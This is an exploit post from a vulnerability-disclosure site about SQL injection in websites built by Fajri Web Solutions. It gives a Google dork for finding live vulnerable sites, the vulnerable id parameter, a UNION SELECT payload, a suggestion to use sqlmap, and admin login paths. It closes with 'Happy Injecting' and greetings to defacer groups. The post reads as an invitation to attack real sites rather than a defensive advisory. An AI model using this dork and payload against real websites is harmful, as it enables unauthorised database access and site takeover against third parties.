Fajri Web Solutions SQL-Injection Vulnerability

2019.02.20
id DarkOct02 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+]Exploit Title: Fajri Web Solutions SQL-Injection Vulnerability [+]Author: DarkOct02 [+]Team: Garuda Tersakti 72 [+]Goolge Dork: "inurl:/php?id= intext:by Fajri.com" [+]Tested on: Linux BackBox [+]Vendor: https://www.fajri.com ======================================= [+]Proof Of Concept: First, you can find inject points in the section about us, or wherever they are in the parameters section of the id. [+]Exploit: ' union all select 1,2,3,4,5-- - Or you can inject manually or with SQLmap [+]Login: Administrator Admin Adminweb [+]Demo? No Demo ^^ Happy Injecting~ Greetz: ./Sn00py - Indonesian Code Party - Khatulistiwa - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top